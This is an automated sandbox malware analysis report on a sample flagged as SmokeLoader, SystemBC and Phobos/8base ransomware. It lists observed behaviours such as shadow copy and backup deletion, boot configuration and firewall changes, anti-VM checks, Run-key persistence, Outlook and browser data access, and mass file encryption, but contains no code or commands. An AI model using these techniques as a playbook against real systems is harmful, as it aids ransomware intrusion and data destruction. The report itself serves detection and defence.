Malware Analysis Report

2024-11-16 12:15

Sample ID 230625-dxzegaea7v
Target e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0
SHA256 e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0
Tags
smokeloader backdoor trojan phobos systembc agilenet collection evasion persistence ransomware spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0

Threat Level: Known bad

The file e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0 was found to be: Known bad.

Malicious Activity Summary

smokeloader backdoor trojan phobos systembc agilenet collection evasion persistence ransomware spyware stealer themida

SmokeLoader

SystemBC

Phobos

Deletes shadow copies

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies boot configuration data using bcdedit

Renames multiple (456) files with added filename extension

Deletes backup catalog

Downloads MZ/PE file

Modifies Windows Firewall

Loads dropped DLL

Themida packer

Executes dropped EXE

Obfuscated with Agile.Net obfuscator

Checks computer location settings

Reads user/profile data of web browsers

Drops startup file

Checks BIOS information in registry

Checks whether UAC is enabled

Drops desktop.ini file(s)

Accesses Microsoft Outlook profiles

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

Unsigned PE

outlook_win_path

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

Interacts with shadow copies

outlook_office_path

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-06-25 03:23

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-06-25 03:23

Reported

2023-06-25 03:25

Platform

win7-20230621-en

Max time kernel

66s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1696 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1696 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1696 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1696 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1696 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1696 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1696 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe"

C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe"

Network

N/A

Files

memory/1696-54-0x0000000000220000-0x0000000000235000-memory.dmp

memory/1320-55-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1320-56-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1696-57-0x0000000000240000-0x0000000000249000-memory.dmp

memory/1320-58-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1320-60-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1356-59-0x0000000002740000-0x0000000002756000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-06-25 03:23

Reported

2023-06-25 03:26

Platform

win10v2004-20230621-en

Max time kernel

88s

Max time network

117s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe"

Signatures

Phobos

ransomware phobos

SmokeLoader

trojan backdoor smokeloader

SystemBC

trojan systembc

Deletes shadow copies

ransomware

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\F9AA.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (456) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\F9AA.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\F9AA.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\F9AA.exe N/A

Drops startup file

Description Indicator Process Target
File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\E9AA.exe C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\F9AA.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\E9AA = "C:\\Users\\Admin\\AppData\\Local\\E9AA.exe" C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\E9AA = "C:\\Users\\Admin\\AppData\\Local\\E9AA.exe" C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Riqyrsb = "C:\\Users\\Admin\\AppData\\Roaming\\Riqyrsb.exe" C:\Users\Admin\AppData\Local\Temp\E709.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\F9AA.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-4129409437-3162877118-52503038-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-4129409437-3162877118-52503038-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\System.Runtime.InteropServices.RuntimeInformation.dll.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_hover_18.svg C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-api.xml.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.OleDbInterop.dll.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\CONCRETE.ELM C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_neutral_split.scale-100_8wekyb3d8bbwe\images\Square310x310Logo.scale-100.png C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\VisualElements\LogoBeta.png.DATA C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\jre\bin\dt_socket.dll.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-80_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-64_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\SolitaireLiveTileUpdater.dll C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Corbel.xml C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_OEM_Perp-ul-oob.xrm-ms.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_File_Transfer_Complete.m4a C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\ui-strings.js.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\ink\fr-FR\TabTip32.exe.mui C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Excel.ReportingServices.QueryDesigners.Extensions.dll.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\video_filter\libcolorthres_plugin.dll.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTrial-pl.xrm-ms.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected][BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\protocolhandler.exe.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-windows_zh_CN.jar.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial3-ul-oob.xrm-ms.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\check.cur.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ppd.xrm-ms.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-80.png.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\Microsoft.PackageManagement.MetaProvider.PowerShell.dll C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\VisualElements\SmallLogoDev.png.DATA C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp6-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AXIS\PREVIEW.GIF.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-48_altform-colorize.png C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\ui-strings.js C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\logo_retina.png.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mk.txt C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Templates\1033\EssentialLetter.dotx.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\COMPASS\COMPASS.ELM.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_checkbox_unselected_18.svg C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\BHO\ie_to_edge_bho_64.dll C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-180.png C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL111.XML.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Mozilla Firefox\dependentlibs.list.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Mozilla Firefox\softokn3.dll.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\ui-strings.js.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\ui-strings.js.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-tw\ui-strings.js C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-filesystem-l1-1-0.dll C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\main.css C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\ui-strings.js.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ONENOTEIMP.DLL.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldMatch.snippets.ps1xml C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\zh-hk_get.svg C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\Match.Tests.ps1 C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\LibrarySquare150x150Logo.scale-100.png C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\control\libwin_msg_plugin.dll.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A

Enumerates physical storage devices

Program crash

